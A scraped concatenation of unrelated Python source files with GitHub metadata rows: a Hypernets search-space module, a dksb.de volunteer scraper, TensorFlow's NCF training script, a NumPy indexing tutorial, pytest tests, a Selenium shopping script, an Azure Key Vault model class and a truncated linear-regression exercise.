        return {'timestamp': self.timestamp}
    @property
    def estimators(self):
        # Return only the estimator family matching the configured task.
        if self.task == consts.TASK_UNIVARIABLE_FORECAST:
            candidates = {}
            if self.enable_prophet:
                candidates['prophet'] = (ProphetForecastEstimator,
                                         self.default_prophet_init_kwargs,
                                         self.default_prophet_fit_kwargs)
            return candidates
        if self.task == consts.TASK_MULTIVARIABLE_FORECAST:
            candidates = {}
            if self.enable_var:
                candidates['var'] = (VARForecastEstimator,
                                     self.default_var_init_kwargs,
                                     self.default_var_fit_kwargs)
            return candidates
        raise ValueError(f'Incorrect task name, default {consts.TASK_UNIVARIABLE_FORECAST}'
                         f' or {consts.TASK_MULTIVARIABLE_FORECAST}.')
class StatsClassificationSearchSpace(BaseSearchSpaceGenerator):
    """Search space over classical time-series classifiers (Time Series Forest)."""
    def __init__(self, task, timestamp=None,
                 enable_tsf=True,
                 **kwargs):
        # BUG FIX: the original guard was `hasattr(kwargs, 'covariables')`,
        # which checks for an *attribute* on the dict object and is always
        # False, so the intended removal never ran. Classification does not
        # accept covariables; drop the key unconditionally (pop with a
        # default is a no-op when it is absent).
        kwargs.pop('covariables', None)
        print("Tip: If other parameters exist, set them directly. For example, n_estimators=200.")
        super(StatsClassificationSearchSpace, self).__init__(**kwargs)
        self.task = task
        self.timestamp = timestamp
        self.enable_tsf = enable_tsf
    @property
    def default_tsf_init_kwargs(self):  # Time Series Forest
        # Hyperparameter search ranges for the Time Series Forest classifier.
        return {
            'min_interval': Choice([1, 3, 5, 7]),
            'n_estimators': Choice([50, 100, 200, 300]),
        }
    @property
    def default_tsf_fit_kwargs(self):
        return {
            'timestamp': self.timestamp
        }
    @property
    def estimators(self):
        containers = {}
        if self.enable_tsf:
            containers['tsf'] = (TSFClassificationEstimator, self.default_tsf_init_kwargs, self.default_tsf_fit_kwargs)
        return containers
# Public factory aliases for the statistical search spaces.
stats_forecast_search_space = StatsForecastSearchSpace
stats_classification_search_space = StatsClassificationSearchSpace
# Placeholders for search spaces that are not implemented yet.
stats_regression_search_space = None
dl_univariate_forecast_search_space = None
dl_multivariate_forecast_search_space = None
dl_univariate_classification_search_space = None
dl_multivariate_classification_search_space = None
# Smoke test: build a univariate forecast space and sample one candidate.
if __name__ == '__main__':
    from hypernets.searchers.random_searcher import RandomSearcher
    sfss = stats_forecast_search_space(task='univariable-forecast', timestamp='ts', covariables=['id', 'cos'])
    searcher = RandomSearcher(sfss, optimize_direction='min')
    sample = searcher.sample()
    print(sample)
| 36.252396 | 119 | 0.628448 |
98f3c32a23563392b8045420c233953252ae871a
| 4,516 |
py
|
Python
|
etl/data_extraction/scrapers/dksb_kinderschutzbund.py
|
Betadinho/einander-helfen
|
272f11397d80ab5267f39a7b36734495f1c00b0c
|
[
"MIT"
] | 7 |
2020-04-23T20:16:11.000Z
|
2022-01-04T14:57:16.000Z
|
etl/data_extraction/scrapers/dksb_kinderschutzbund.py
|
Betadinho/einander-helfen
|
272f11397d80ab5267f39a7b36734495f1c00b0c
|
[
"MIT"
] | 361 |
2020-04-23T17:20:14.000Z
|
2022-03-02T11:29:45.000Z
|
etl/data_extraction/scrapers/dksb_kinderschutzbund.py
|
Betadinho/einander-helfen
|
272f11397d80ab5267f39a7b36734495f1c00b0c
|
[
"MIT"
] | 1 |
2021-11-29T06:02:52.000Z
|
2021-11-29T06:02:52.000Z
|
import re
from data_extraction.scraper import Scraper
class DKSBScraper(Scraper):
    """Scrapes the website dksb.de."""
    base_url = 'https://www.dksb.de'
    # NOTE(review): debug stays enabled here -- confirm that is intended.
    debug = True
    def parse(self, response, url):
        """Handles the soupified response of a detail page in the predefined way and returns it"""
        content = response.find('div', {'class': 'remodal-content'})
        title_h2 = content.find('h2', {'class': 'subHeadline'})
        title = 'Deutscher Kinderschutzbund ' + title_h2.text
        # Walk the siblings after the headline: plain-text nodes up to the
        # first <b> tag form the postal address (loc); from the first <b>
        # tag onward the raw markup is accumulated verbatim as the contact
        # section.
        next_elem = title_h2.next_sibling
        loc = []
        zipcode = None
        contact = ''
        is_loc_part = True
        while next_elem is not None:
            if is_loc_part and re.match(r'<b>', str(next_elem)):
                is_loc_part = False
            if is_loc_part and not re.match(r'<.*?>', str(next_elem)):
                elem = str(next_elem).strip()
                if len(elem) > 0:
                    loc.append(elem)
                    # Address lines like "12345 City" carry the zipcode
                    # (five digits followed by a space).
                    if re.match(r'\d{5} ', elem):
                        zipcode = elem.split(' ')[0]
            if not is_loc_part:
                contact += str(next_elem)
            next_elem = next_elem.next_sibling
        # Flat record in the einander-helfen post format; the task text is a
        # fixed description shared by all DKSB detail pages.
        parsed_object = {
            'title': title,
            'categories': ['Kinder', 'Jugend'],
            'location': ', '.join(loc),
            'task': """Der Deutsche Kinderschutzbund (DKSB) bietet Ihnen in seinen Orts- und Landesverbänden eine Vielzahl von Möglichkeiten, sich freiwillig zu engagieren.<br>
Wenn Ihre Stärken in der Arbeit mit Kindern oder Familien liegen, können Sie z.B. in der Hausaufgabenhilfe oder in Hilfsangeboten für Familien mitarbeiten. Möchten Sie sich in der Büroorganisation oder im Finanzbereich engagieren, sind Sie in der Vorstandsarbeit herzlich willkommen. Auch bei der fachpolitischen Lobbyarbeit für Kinder und Familien ist Ihr Engagement wichtig. Setzen Sie sich in Ihrer Gemeinde für den Kinderschutz ein.<br>
Wenn Sie ehrenamtlich beim DKSB mitarbeiten, lernen Sie gleichgesinnte Menschen kennen und können sich in der Arbeit mit Kindern und Familien weiterqualifizieren. Zudem bestimmen Sie die Verbandsarbeit aktiv mit.""",
            'target_group': None,
            'prerequisites': None,
            'language_skills': None,
            'timing': None,
            'effort': None,
            'opportunities': None,
            'organization': None,
            'contact': contact,
            'link': url or None,
            'source': 'www.dksb.de',
            'geo_location': None,
        }
        # Structured variant of the record; only the zipcode is extracted
        # from the address, the rest stays unset.
        parsed_object['post_struct'] = {
            'title': parsed_object['title'],
            'categories': parsed_object['categories'],
            'location': {
                'country': 'Deutschland',
                'zipcode': zipcode,
                'city': None,
                'street': None,
            },
            'task': None,
            'target_group': None,
            'prerequisites': None,
            'language_skills': None,
            'timing': None,
            'effort': None,
            'opportunities': None,
            'organization': None,
            'contact': None,
            'link': parsed_object['link'],
            'source': parsed_object['source'],
            'geo_location': parsed_object['geo_location'],
        }
        return parsed_object
    def add_urls(self):
        """Adds all URLs of detail pages, found on the search pages, for the crawl function to scrape"""
        self.logger.debug('add_urls()')
        search_page_url = f'{self.base_url}/de/dksb-vor-ort/'
        response = self.soupify(search_page_url)
        detail_list_entries = response.find_all('div', {'class': 'list-dksbvorort-item'})
        self.logger.debug(f'Fetched {len(detail_list_entries)} URLs from {search_page_url} [1/1]')
        self.update_fetching_progress(1, 1)
        # Iterate links and add, if not already found
        for list_entry in detail_list_entries:
            # The detail pages are served by a PHP endpoint keyed by the
            # entry's name attribute.
            current_link = self.base_url + '/template/php/dksbvorort/details.php?key=' + list_entry['name']
            if current_link in self.urls:
                self.logger.debug(f'func: add_urls, page_index: 1,'
                                  f' search_page: {search_page_url}, '
                                  f'duplicate_index: {current_link}, '
                                  f'duplicate_index: {self.urls.index(current_link)}')
            else:
                self.urls.append(current_link)
1be4de6cb8b2d5185f3dc017be273257ae0589df
| 6,858 |
py
|
Python
|
Liquid-job-NeuMF/official/recommendation/ncf_estimator_main.py
|
PasaLab/YAO
|
2e70203197cd79f9522d65731ee5dc0eb236b005
|
[
"Apache-2.0"
] | 2 |
2021-08-30T14:12:09.000Z
|
2022-01-20T02:14:22.000Z
|
Liquid-job-NeuMF/official/recommendation/ncf_estimator_main.py
|
PasaLab/YAO
|
2e70203197cd79f9522d65731ee5dc0eb236b005
|
[
"Apache-2.0"
] | null | null | null |
Liquid-job-NeuMF/official/recommendation/ncf_estimator_main.py
|
PasaLab/YAO
|
2e70203197cd79f9522d65731ee5dc0eb236b005
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""NCF framework to train and evaluate the NeuMF model.
The NeuMF model assembles both MF and MLP models under the NCF framework. Check
`neumf_model.py` for more details about the models.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import heapq
import json
import math
import multiprocessing
import os
import signal
import typing
# pylint: disable=g-bad-import-order
import numpy as np
from absl import app as absl_app
from absl import flags
from absl import logging
import tensorflow as tf
# pylint: enable=g-bad-import-order
from official.recommendation import constants as rconst
from official.recommendation import data_pipeline
from official.recommendation import data_preprocessing
from official.recommendation import movielens
from official.recommendation import ncf_common
from official.recommendation import neumf_model
from official.utils.flags import core as flags_core
from official.utils.logs import hooks_helper
from official.utils.logs import logger
from official.utils.logs import mlperf_helper
from official.utils.misc import distribution_utils
from official.utils.misc import model_helpers
FLAGS = flags.FLAGS
def construct_estimator(model_dir, params):
  """Build the NCF tf.estimator.Estimator.

  Args:
    model_dir: Directory used for checkpoints and summaries.
    params: Hyperparameter dict forwarded to the model function.

  Returns:
    An Estimator running neumf_model.neumf_model_fn under the distribution
    strategy selected from params.
  """
  strategy = ncf_common.get_v1_distribution_strategy(params)
  config = tf.estimator.RunConfig(train_distribute=strategy,
                                  eval_distribute=strategy)
  return tf.estimator.Estimator(model_fn=neumf_model.neumf_model_fn,
                                model_dir=model_dir,
                                config=config,
                                params=params)
def log_and_get_hooks(eval_batch_size):
  """Create the training hooks and the benchmark logger, logging run info.

  Args:
    eval_batch_size: Evaluation batch size recorded in the run metadata.

  Returns:
    A (benchmark_logger, train_hooks) pair.
  """
  hooks = hooks_helper.get_train_hooks(
      FLAGS.hooks,
      model_dir=FLAGS.model_dir,
      batch_size=FLAGS.batch_size,  # for ExamplesPerSecondHook
      tensors_to_log={"cross_entropy": "cross_entropy"})
  params_to_log = {
      "batch_size": FLAGS.batch_size,
      "eval_batch_size": eval_batch_size,
      "number_factors": FLAGS.num_factors,
      "hr_threshold": FLAGS.hr_threshold,
      "train_epochs": FLAGS.train_epochs,
  }
  bench_logger = logger.get_benchmark_logger()
  bench_logger.log_run_info(
      model_name="recommendation",
      dataset_name=FLAGS.dataset,
      run_params=params_to_log,
      test_id=FLAGS.benchmark_test_id)
  return bench_logger, hooks
def main(_):
  """Absl entry point: run NCF inside benchmark and MLPerf logging contexts."""
  with logger.benchmark_context(FLAGS):
    with mlperf_helper.LOGGER(FLAGS.output_ml_perf_compliance_logging):
      mlperf_helper.set_ncf_root(os.path.split(os.path.abspath(__file__))[0])
      run_ncf(FLAGS)
def run_ncf(_):
  """Run NCF training and eval loop.

  Trains for FLAGS.train_epochs epochs, evaluating every
  FLAGS.epochs_between_evals epochs, and stops early once the hit-rate
  threshold (FLAGS.hr_threshold) is reached.
  """
  params = ncf_common.parse_flags(FLAGS)
  num_users, num_items, num_train_steps, num_eval_steps, producer = (
      ncf_common.get_inputs(params))
  params["num_users"], params["num_items"] = num_users, num_items
  # Start the asynchronous data producer before training begins.
  producer.start()
  model_helpers.apply_clean(flags.FLAGS)
  estimator = construct_estimator(model_dir=FLAGS.model_dir, params=params)
  benchmark_logger, train_hooks = log_and_get_hooks(params["eval_batch_size"])
  total_training_cycle = FLAGS.train_epochs // FLAGS.epochs_between_evals
  target_reached = False
  mlperf_helper.ncf_print(key=mlperf_helper.TAGS.TRAIN_LOOP)
  for cycle_index in range(total_training_cycle):
    # MLPerf compliance logging assumes exactly one epoch per cycle.
    assert FLAGS.epochs_between_evals == 1 or not mlperf_helper.LOGGER.enabled
    logging.info("Starting a training cycle: {}/{}".format(
        cycle_index + 1, total_training_cycle))
    mlperf_helper.ncf_print(key=mlperf_helper.TAGS.TRAIN_EPOCH,
                            value=cycle_index)
    train_input_fn = producer.make_input_fn(is_training=True)
    estimator.train(input_fn=train_input_fn, hooks=train_hooks,
                    steps=num_train_steps)
    logging.info("Beginning evaluation.")
    eval_input_fn = producer.make_input_fn(is_training=False)
    mlperf_helper.ncf_print(key=mlperf_helper.TAGS.EVAL_START,
                            value=cycle_index)
    eval_results = estimator.evaluate(eval_input_fn, steps=num_eval_steps)
    logging.info("Evaluation complete.")
    hr = float(eval_results[rconst.HR_KEY])
    ndcg = float(eval_results[rconst.NDCG_KEY])
    loss = float(eval_results["loss"])
    mlperf_helper.ncf_print(
        key=mlperf_helper.TAGS.EVAL_TARGET,
        value={"epoch": cycle_index, "value": FLAGS.hr_threshold})
    mlperf_helper.ncf_print(key=mlperf_helper.TAGS.EVAL_ACCURACY,
                            value={"epoch": cycle_index, "value": hr})
    mlperf_helper.ncf_print(
        key=mlperf_helper.TAGS.EVAL_HP_NUM_NEG,
        value={"epoch": cycle_index, "value": rconst.NUM_EVAL_NEGATIVES})
    mlperf_helper.ncf_print(key=mlperf_helper.TAGS.EVAL_STOP, value=cycle_index)
    # Benchmark the evaluation results
    benchmark_logger.log_evaluation_result(eval_results)
    # Log the HR and NDCG results.
    logging.info(
        "Iteration {}: HR = {:.4f}, NDCG = {:.4f}, Loss = {:.4f}".format(
            cycle_index + 1, hr, ndcg, loss))
    # If some evaluation threshold is met
    if model_helpers.past_stop_threshold(FLAGS.hr_threshold, hr):
      target_reached = True
      break
  mlperf_helper.ncf_print(key=mlperf_helper.TAGS.RUN_STOP,
                          value={"success": target_reached})
  # Shut the async producer down before tearing down the session.
  producer.stop_loop()
  producer.join()
  # Clear the session explicitly to avoid session delete error
  tf.keras.backend.clear_session()
  mlperf_helper.ncf_print(key=mlperf_helper.TAGS.RUN_FINAL)
# Script entry: configure logging, define the NCF flags, then hand control
# to absl's app runner.
if __name__ == "__main__":
  logging.set_verbosity(logging.INFO)
  ncf_common.define_ncf_flags()
  absl_app.run(main)
| 36.094737 | 81 | 0.715223 |
409ee4439c5e2beef5d84d0609d9d97498d8be26
| 3,831 |
py
|
Python
|
python/en/_numpy/python_numpy_tutorial/python_numpy_tutorial-numpy_array_indexing.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/_numpy/python_numpy_tutorial/python_numpy_tutorial-numpy_array_indexing.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/_numpy/python_numpy_tutorial/python_numpy_tutorial-numpy_array_indexing.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CS231n Convolutional Neural Networks for Visual Recognition
http://cs231n.github.io/
Python Numpy Tutorial
http://cs231n.github.io/python-numpy-tutorial/
Numpy Reference
https://docs.scipy.org/doc/numpy/reference/

python_numpy_tutorial-numpy_array_indexing.py
2019-07-02 (Tue)
"""
# Python Numpy Tutorial > Numpy > Array indexing
# Numpy offers several ways to index into arrays.
#
# This examples cover:
#  Slicing
#  Integer array indexing
#  Boolean array indexing
#############
#  Slicing   #
#############
# Similar to Python lists, numpy arrays can be sliced.
# Since arrays may be multidimensional,
# you must specify a slice for each dimension of the array.
import numpy as np
# Create a new array
a = np.array( [[1,2,3,4],[5,6,7,8],[9,10,11,12]])
print(a)
#[[ 1  2  3  4]
# [ 5  6  7  8]
# [ 9 10 11 12]]
# b is a VIEW into a: rows 0-1, columns 1-2 (no data is copied).
b = a[:2,1:3]
print(b)
#[[2 3]
# [6 7]]
print( a[0,1] )
#2
# Writing through the view b mutates the underlying array a.
b[0,0] = 77
print( a[0,1] )
#77
print(a)
#[[ 1 77  3  4]
# [ 5  6  7  8]
# [ 9 10 11 12]]
print(b)
#[[77  3]
# [ 6  7]]
# You can also mix integer indexing with slice indexing.
# However, doing so will yield an array of lower rank than the original array.
# Note this is different from the way MATLAB handles array slicing.
# Re-create a (the write through b above modified the previous array).
a = np.array( [[1,2,3,4],[5,6,7,8],[9,10,11,12]])  # fresh copy
print(a)
#[[ 1  2  3  4]
# [ 5  6  7  8]
# [ 9 10 11 12]]
# Integer index drops the row axis: the result has rank 1.
row_r1 = a[1,:]
print( row_r1, row_r1.shape )
#[5 6 7 8] (4,)
# Slice index keeps the row axis: the result has rank 2.
row_r2 = a[1:2,:]
print( row_r2,row_r2.shape )
#[[5 6 7 8]] (1, 4)
# Same distinction for columns: integer index -> rank 1 ...
col_r1 = a[:,1]
print( col_r1,col_r1.shape )
# [ 2  6 10] (3,)
# ... slice index -> rank 2 (a 3x1 column).
col_r2 = a[:,1:2]
print( col_r2,col_r2.shape )
#[[ 2]
# [ 6]
# [10]] (3, 1)
############################
#  Integer array indexing  #
############################
# When you index into numpy arrays using slicing,
# the resulting array view will always be a subarray of the original array.
# In contrast, integer array indexing allows you to construct arbitrary arrays using the data from another array.
a = np.array( [[1,2],[3,4],[5,6]])
print(a)
#[[1 2]
# [3 4]
# [5 6]]
# An example of integer array indexing: pairs of (row, column) indices.
print( a[[0,1,2],[0,1,0]] )
# [1 4 5]
# Identical to [a[0,0], a[1,1], a[2,0]]
print( np.array( [ a[0,0], a[1,1], a[2,0] ]) )
# [1 4 5]
# The same element from the source array can be used.
# in this case a[0,1] is repeated.
print( a[[0,0],[1,1]] )
# [2,2]
print( np.array( [a[0,1],a[0,1]]) )
# [2,2]
# One useful trick with integer array indexing is
# selecting or mutating one element from each row of a matrix:
# Create a new array
a = np.array( [[1,2,3], [4,5,6], [7,8,9], [10,11,12]])
print(a)
#[[ 1  2  3]
# [ 4  5  6]
# [ 7  8  9]
# [10 11 12]]
# Create an array of indices
b = np.array( [0,2,0,1] )
print( a[ np.arange(4), b] )
# [ 1  6  7 11]
# [np.arange(4), b] means
# [ [0,1,2,3],[0,2,0,1] ]
# => a[0,0], a[1,2], a[2,0], a[3,1]
# Mutate one element from each row of a using the indices in b
a[np.arange(4),b] += 10
print(a)
#[[11  2  3]
# [ 4  5 16]
# [17  8  9]
# [10 21 12]]
# Add 10 to the indices
############################
#  Boolean array indexing  #
############################
# Boolean array indexing lets you pick out arbitrary elements of an array.
# Frequently this type of indexing is used to select the elements of an array
# that satisfy some condition.
a = np.array( [[1,2],[3,4],[5,6]] )
print(a)
#[[1 2]
# [3 4]
# [5 6]]
# Elementwise comparison produces a boolean mask of the same shape.
bool_idx = (a > 2)
print( bool_idx )
#[[False False]
# [ True  True]
# [ True  True]]
# Indexing with the mask returns a rank-1 array of the selected elements.
print( a[bool_idx] )
#[3 4 5 6]
# The comparison can also be written inline.
print( a[ a>2] )
#[3 4 5 6]
print( a[ a>4] )
#[5 6]
31cb02371faa1d6684f8d85cec4fbda3959ffd47
| 483 |
py
|
Python
|
IVTa/2014/BRONNIKOV_I_S/task_2_50.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
IVTa/2014/BRONNIKOV_I_S/task_2_50.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
IVTa/2014/BRONNIKOV_I_S/task_2_50.py
|
YukkaSarasti/pythonintask
|
eadf4245abb65f4400a3bae30a4256b4658e009c
|
[
"Apache-2.0"
] | null | null | null |
# Task 2. Variant 50
# Write a program that prints a favourite quotation whose author is
# Hilarion (Alfeyev); the author must be credited on a separate line.
# Bronnikov I.S.
# 24.05.2016
# (The trailing "" is an empty literal: adjacent string literals are
# concatenated implicitly inside the print() parentheses, so the quote
# and the "\n<author>" line form one string.)
print("«Нельзя «лезть в душу» человека, ибо душа – это святое святых, и туда можно войти только если вам отворят и пригласят внутрь.""
"\nИларион (Алфеев)")
input("\n\nНажмите Enter для выхода.")
| 40.25 | 135 | 0.728778 |
7345727c4eb218c8c13ef8fbdacaf160a942853e
| 1,975 |
py
|
Python
|
tests/test_silly_sum.py
|
ratschlab/software-m53
|
affc6b8bffc72c5dbaa9d4eca513c42962de01fe
|
[
"MIT"
] | null | null | null |
tests/test_silly_sum.py
|
ratschlab/software-m53
|
affc6b8bffc72c5dbaa9d4eca513c42962de01fe
|
[
"MIT"
] | null | null | null |
tests/test_silly_sum.py
|
ratschlab/software-m53
|
affc6b8bffc72c5dbaa9d4eca513c42962de01fe
|
[
"MIT"
] | null | null | null |
import pytest
import riqc.silly_sum as silly_sum
import pandas as pd
import numpy as np
import os
from click.testing import CliRunner
def path_name():
    """Absolute path of the bundled fixture ``tests/data/numbers.txt``."""
    test_dir = os.path.dirname(__file__)
    return os.path.join(test_dir, 'data', 'numbers.txt')
@pytest.fixture
def fixed_number_array():
    """ Returns some numbers from a file """
    path = path_name()
    with open(path) as f:
        # One float per line in the fixture file.
        return np.array([float(l) for l in f])

# Known silly_sum result (step 2) for the numbers.txt fixture,
# shared by several tests below.
expected_file_result = 47.8999
def test_silly_sum_simple():
    # Presumably the default step is 2, so only 1 and 3 are summed — confirm
    # against riqc.silly_sum's signature.
    assert 4 == silly_sum.silly_sum(pd.Series([1, 2, 3]))

def test_silly_sum_raise_exception_on_illegal_step():
    # A non-positive step must be rejected with ValueError.
    with pytest.raises(ValueError):
        silly_sum.silly_sum([], -1)

def test_silly_sum_stepsize_one():
    # to demonstrate handling random data
    np.random.seed(4200)  # important: fix the seed, otherwise hard to reproduce
    data = np.random.uniform(-1.0, 1.0, 10)
    # With step 1 the silly sum degenerates to an ordinary sum.
    assert pytest.approx(sum(data)) == silly_sum.silly_sum(data, 1)

def test_silly_sum_from_file():
    # End-to-end: read the fixture file and sum with step 2.
    assert pytest.approx(expected_file_result) == silly_sum.silly_sum_from_file(
        path_name(), 2)
# Expected silly sums of the numbers.txt fixture for each step size.
@pytest.mark.parametrize("step,expected", [
    (1, 49.9999),
    (2, expected_file_result),
    (3, 4.3),
    (4, 46.9),
    (5, 1.0),
    (6, 1.0)
])
def test_silly_sum_parametrized(fixed_number_array, step, expected):
    # demonstrating parametrized testing
    assert pytest.approx(expected) == silly_sum.silly_sum(fixed_number_array,
                                                          step)
def test_command_line_interface():
    """ Test the CLI. """
    runner = CliRunner()
    help_result = runner.invoke(silly_sum.main, ['--help'])
    assert help_result.exit_code == 0
    assert 'Show this message and exit.' in help_result.output

def test_end_to_end():
    # Integration test
    # Run the CLI on the fixture file and check the printed sum.
    runner = CliRunner()
    result = runner.invoke(silly_sum.main, ['--step', '2', path_name()])
    assert pytest.approx(expected_file_result) == float(result.output)
    assert result.exit_code == 0
| 26.333333 | 80 | 0.674937 |
6f07b1e6dd52db107d74ed2e6da84f7edff620de
| 167 |
py
|
Python
|
entrypoint.py
|
uosorio/heroku_face
|
7d6465e71dba17a15d8edaef520adb2fcd09d91e
|
[
"Apache-2.0"
] | null | null | null |
entrypoint.py
|
uosorio/heroku_face
|
7d6465e71dba17a15d8edaef520adb2fcd09d91e
|
[
"Apache-2.0"
] | null | null | null |
entrypoint.py
|
uosorio/heroku_face
|
7d6465e71dba17a15d8edaef520adb2fcd09d91e
|
[
"Apache-2.0"
] | null | null | null |
import os

from flask import send_from_directory
from app import create_app

# Select the settings module (e.g. dev/prod) from the environment.
settings_module = os.getenv('APP_SETTINGS_MODULE')
# Application-factory pattern: build the Flask app with those settings.
# NOTE(review): `send_from_directory` is imported but unused in this snippet —
# confirm it is needed elsewhere before removing.
app = create_app(settings_module)
| 12.846154 | 50 | 0.808383 |
48f52ab0eaed81e6b6dd60c19fd3bdff844586ae
| 2,591 |
py
|
Python
|
azext_keyvault/keyvault/models/deleted_storage_account_item_py3.py
|
jdmartinez36/azure-keyvault-cli-extension
|
4dc674b9c30cac13e27347782c49b3ed7dca2e2f
|
[
"MIT"
] | 2 |
2019-06-12T13:44:34.000Z
|
2020-06-01T13:24:04.000Z
|
azext_keyvault/keyvault/models/deleted_storage_account_item_py3.py
|
jdmartinez36/azure-keyvault-cli-extension
|
4dc674b9c30cac13e27347782c49b3ed7dca2e2f
|
[
"MIT"
] | 5 |
2018-04-26T01:14:29.000Z
|
2021-01-05T00:45:39.000Z
|
azext_keyvault/keyvault/models/deleted_storage_account_item_py3.py
|
jdmartinez36/azure-keyvault-cli-extension
|
4dc674b9c30cac13e27347782c49b3ed7dca2e2f
|
[
"MIT"
] | 8 |
2018-04-24T22:52:48.000Z
|
2021-11-16T06:29:28.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .storage_account_item import StorageAccountItem
class DeletedStorageAccountItem(StorageAccountItem):
    """The deleted storage account item containing metadata about the deleted
    storage account.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :ivar id: Storage identifier.
    :vartype id: str
    :ivar resource_id: Storage account resource Id.
    :vartype resource_id: str
    :ivar attributes: The storage account management attributes.
    :vartype attributes: ~azure.keyvault.models.StorageAccountAttributes
    :ivar tags: Application specific metadata in the form of key-value pairs.
    :vartype tags: dict[str, str]
    :param recovery_id: The url of the recovery object, used to identify and
     recover the deleted storage account.
    :type recovery_id: str
    :ivar scheduled_purge_date: The time when the storage account is scheduled
     to be purged, in UTC
    :vartype scheduled_purge_date: datetime
    :ivar deleted_date: The time when the storage account was deleted, in UTC
    :vartype deleted_date: datetime
    """

    _validation = {
        'id': {'readonly': True},
        'resource_id': {'readonly': True},
        'attributes': {'readonly': True},
        'tags': {'readonly': True},
        'scheduled_purge_date': {'readonly': True},
        'deleted_date': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'resource_id': {'key': 'resourceId', 'type': 'str'},
        'attributes': {'key': 'attributes', 'type': 'StorageAccountAttributes'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'recovery_id': {'key': 'recoveryId', 'type': 'str'},
        'scheduled_purge_date': {'key': 'scheduledPurgeDate', 'type': 'unix-time'},
        'deleted_date': {'key': 'deletedDate', 'type': 'unix-time'},
    }

    def __init__(self, *, recovery_id: str=None, **kwargs) -> None:
        # Fix: the original call was `super(...).__init__(, **kwargs)` — the
        # stray comma is a SyntaxError. Forward only **kwargs to the base class.
        super(DeletedStorageAccountItem, self).__init__(**kwargs)
        self.recovery_id = recovery_id
        self.scheduled_purge_date = None
        self.deleted_date = None
| 40.484375 | 83 | 0.631802 |
d28cadfb615f40b4aa31a886f41c4ad1f9698e9a
| 928 |
py
|
Python
|
sn.py
|
weibk/webauto
|
f494f8043d05739935d1fc22b941bbc9a7ba75b7
|
[
"MIT"
] | null | null | null |
sn.py
|
weibk/webauto
|
f494f8043d05739935d1fc22b941bbc9a7ba75b7
|
[
"MIT"
] | null | null | null |
sn.py
|
weibk/webauto
|
f494f8043d05739935d1fc22b941bbc9a7ba75b7
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# encoding='utf-8'
# author:weibk
# @time:2021/10/22 14:28
from selenium import webdriver
from selenium.webdriver.common import keys

# Selenium walkthrough: search suning.com for a phone and add it to the cart.
driver = webdriver.Chrome()
driver.get('https://www.suning.com/')
driver.maximize_window()
# Type the query and submit with Enter.
driver.find_element_by_xpath('//*[@id="searchKeywords"]').send_keys('小米10')
driver.find_element_by_xpath('//*[@id="searchKeywords"]').send_keys(
    keys.Keys.ENTER)
# Remember the original window so the new product tab can be identified.
original = driver.current_window_handle
driver.implicitly_wait(5)
# Click the 4th search result; it opens in a new window/tab.
driver.find_elements_by_css_selector('.sellPoint')[3].click()
driver.implicitly_wait(5)
# Switch to whichever handle is not the original window.
for i in driver.window_handles:
    if i != original:
        driver.switch_to.window(i)
driver.find_element_by_xpath('//*[@id="addCart"]').click()
driver.implicitly_wait(5)
print(driver.title)
print(driver.window_handles)
# NOTE(review): switch_to.frame() is called without a frame reference — this
# raises TypeError at runtime; the cart confirmation iframe locator appears
# to be missing. Confirm the intended frame before relying on this script.
driver.switch_to.frame()
driver.find_element_by_xpath('//*[@class="go-cart" and '
                             'name="cart1_go"]').click()
d2f1aaec135bcb8fa182512c8c594a6aab38e0cc
| 1,830 |
py
|
Python
|
ng-003/ex1-003/py_ex1/main.py
|
zaqwes8811/cs-courses
|
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
|
[
"Apache-2.0"
] | null | null | null |
ng-003/ex1-003/py_ex1/main.py
|
zaqwes8811/cs-courses
|
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
|
[
"Apache-2.0"
] | null | null | null |
ng-003/ex1-003/py_ex1/main.py
|
zaqwes8811/cs-courses
|
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Model:
h = theta_0+theta_1 * x
x_m - matrix
x - vector
Local min:
http://book.caltech.edu/bookforum/showthread.php?p=10595
convex function
Danger:
В NumPy операции с матрицами очень опасные - никакой защиты.
Numpy:
http://wiki.scipy.org/NumPy_for_Matlab_Users
"""
import numpy
import pylab
import numpy as np
def warm_up_exercise():
    """Return the 5x5 identity matrix (course warm-up exercise)."""
    identity = numpy.eye(5)
    return identity
def load(filename):
    """Parse a comma-separated numeric text file into a float ndarray."""
    return numpy.genfromtxt(filename, delimiter=',')
def plot_data(x, y):
    """Scatter-plot the raw data points; blocks until the window is closed."""
    pylab.plot(x, y, '+')
    pylab.show()
def compute_cost(m_x, y, theta):
    """Linear-regression cost J(theta) = 1/(2m) * sum((X*theta - y)^2).

    `m_x` is the design matrix (with bias column), `y` the target column
